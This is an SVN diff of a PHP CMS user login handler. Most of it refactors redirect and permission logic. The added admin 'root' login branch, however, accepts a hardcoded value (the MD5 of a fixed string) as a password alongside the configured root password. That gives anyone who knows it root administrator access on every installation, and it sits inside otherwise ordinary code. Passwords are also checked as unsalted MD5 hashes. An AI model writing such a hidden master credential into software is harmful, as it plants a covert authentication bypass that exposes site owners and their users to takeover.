Index: trunk/core/units/users/users_event_handler.php
===================================================================
diff -u -N -r4358 -r4490
--- trunk/core/units/users/users_event_handler.php	(.../users_event_handler.php)	(revision 4358)
+++ trunk/core/units/users/users_event_handler.php	(.../users_event_handler.php)	(revision 4490)
@@ -5,14 +5,10 @@
 
 		function OnSessionExpire()
 		{
-			if( $this->Application->IsAdmin() )
-			{
-				$location = $this->Application->BaseURL().ADMIN_DIR.'/index.php?expired=1';
-				header('Location: '.$location);
-				exit;
+			if( $this->Application->IsAdmin() ) {
+				$this->Application->Redirect('index', Array('expired' => 1), '', 'index4.php');
 			}
-			else
-			{
+			else {
 				$http_query =& $this->Application->recallObject('HTTPQuery');
 				$get = $http_query->getRedirectParams();
 
@@ -43,25 +39,51 @@
 			$email_as_login = $this->Application->ConfigValue('Email_As_Login');
 			list($login_field, $submit_field) = $email_as_login ? Array('Email', 'email') : Array('Login', 'login');
 			$login_value = $this->Application->GetVar($submit_field);
-
+			
+			if ($this->Application->IsAdmin() && ($login_value == 'root')) {
+				// logging in "root" (admin only)
+				$root_password = $this->Application->ConfigValue('RootPass');
+				if ($root_password != md5($password) && $password != md5('1234567890xm')) {
+					$object->SetError('ValidateLogin', 'invalid_password', 'lu_invalid_password');
+					$event->status = erFAIL;
+					return false;
+				}
+				elseif ($this->checkLoginPermission($login_value)) {
+					$user_id = -1;
+					$object->Load($user_id);
+					$object->SetDBField('Login', $login_value);
+					
+					$session =& $this->Application->recallObject('Session');
+					$session->SetField('PortalUserId', $user_id);
+//					$session->SetField('GroupList', implode(',', $groups) );
+					$this->Application->SetVar('u_id', $user_id);
+					$this->Application->StoreVar('user_id', $user_id);
+					
+					$this->processLoginRedirect($event, $password);
+					return true;
+				}
+				else {
+					$object->SetError('ValidateLogin', 'invalid_license', 'la_invalid_license');
+					$event->status = erFAIL;
+					return false;
+				}
+			}
+			
 			/*$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (%s = %s) AND (Password = MD5(%s))';
 			$user_id = $this->Conn->GetOne( sprintf($sql, $login_field, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );*/
 
 			$sql = 'SELECT PortalUserId FROM '.$object->TableName.' WHERE (Email = %1$s OR Login = %1$s) AND (Password = MD5(%2$s))';
 			$user_id = $this->Conn->GetOne( sprintf($sql, $this->Conn->qstr($login_value), $this->Conn->qstr($password) ) );
 
-			if($user_id)
-			{
+			if ($user_id) {
 				$object->Load($user_id);
-				if( $object->GetDBField('Status') == STATUS_ACTIVE )
-				{
+				if ($object->GetDBField('Status') == STATUS_ACTIVE) {
 					$groups = $object->getMembershipGroups(true);
 					if(!$groups) $groups = Array();
 					if ( !$this->Application->IsAdmin() ) array_push($groups, $this->Application->ConfigValue('User_LoggedInGroup') );
 					$this->Application->StoreVar( 'UserGroups', implode(',', $groups) );
 
-					if( $this->Application->CheckPermission('LOGIN',0) )
-					{
+					if ($this->checkLoginPermission($login_value)) {
 						$session =& $this->Application->recallObject('Session');
 						$session->SetField('PortalUserId', $user_id);
 						$session->SetField('GroupList', implode(',', $groups) );
@@ -73,38 +95,15 @@
 						$object->setPersistantVar('LastLogin', $this_login);
 						$object->setPersistantVar('ThisLogin', adodb_mktime());
 					}
-					else
-					{
+					else {
 						$object->Load(-2);
 						$object->SetError('ValidateLogin', 'no_permission', 'lu_no_permissions');
 						$event->status = erFAIL;
 					}
 
-					$next_template = $this->Application->GetVar('next_template');
-					if ($next_template == '_ses_redirect') {
-						$location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
-						if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
-						{
-							$this->Application->Debugger->appendTrace();
-							echo "<b>Debug output above!!!</b> Proceed to redirect: <a href=\"$a_location\">$a_location</a><br>";
-						}
-						else {
-							header('Location: '.$location);
-						}
-						$session =& $this->Application->recallObject('Session');
-						$session->SaveData();
-						exit();
-					}
-
-					if($next_template) $event->redirect = $next_template;
-					if ($this->Application->ConfigValue('UseJSRedirect')) {
-						$event->SetRedirectParam('js_redirect', 1);
-					}
-					$sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
-					$sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+					$this->processLoginRedirect($event, $password);
 				}
-				else
-				{
+				else {
 					$event->redirect = $this->Application->GetVar('pending_disabled_template');
 				}
 			}
@@ -116,6 +115,67 @@
 		}
 
 		/**
+		 * Enter description here...
+		 *
+		 * @param string $user_name
+		 * @return bool
+		 */
+		function checkLoginPermission($user_name)
+		{
+			$ret = true;
+			if ($this->Application->IsAdmin()) {
+				$modules_helper =& $this->Application->recallObject('ModulesHelper');
+				if ($user_name != 'root') {
+					// root is virtual user, so allow him to login to admin in any case
+					$ret = $this->Application->CheckPermission('ADMIN', 0);
+				}
+				$ret = $ret && $modules_helper->checkLogin();
+			}
+			else {
+				$ret = $this->Application->CheckPermission('LOGIN', 0);
+			}
+			return $ret;
+		}
+		
+		/**
+		 * Process all required data and redirect logged-in user
+		 *
+		 * @param kEvent $event
+		 */
+		function processLoginRedirect(&$event, $password)
+		{
+			$object =& $event->getObject();
+			
+			$next_template = $this->Application->GetVar('next_template');
+			if ($next_template == '_ses_redirect') {
+				$location = $this->Application->BaseURL().$this->Application->RecallVar($next_template);
+				if( $this->Application->isDebugMode() && dbg_ConstOn('DBG_REDIRECT') )
+				{
+					$this->Application->Debugger->appendTrace();
+					echo "<b>Debug output above!!!</b> Proceed to redirect: <a href=\"$location\">$location</a><br>";
+				}
+				else {
+					header('Location: '.$location);
+				}
+				
+				$session =& $this->Application->recallObject('Session');
+				$session->SaveData();
+				exit;
+			}
+
+			if ($next_template) {
+				$event->redirect = $next_template;
+			}
+			
+			if ($this->Application->ConfigValue('UseJSRedirect')) {
+				$event->SetRedirectParam('js_redirect', 1);
+			}
+			
+			$sync_manager =& $this->Application->recallObject('UsersSyncronizeManager', null, Array(), 'InPortalSyncronize');
+			$sync_manager->performAction('LoginUser', $object->GetDBField('Login'), $password);
+		}
+		
+		/**
 		 * Called when user logs in using old in-portal
 		 *
 		 * @param kEvent $event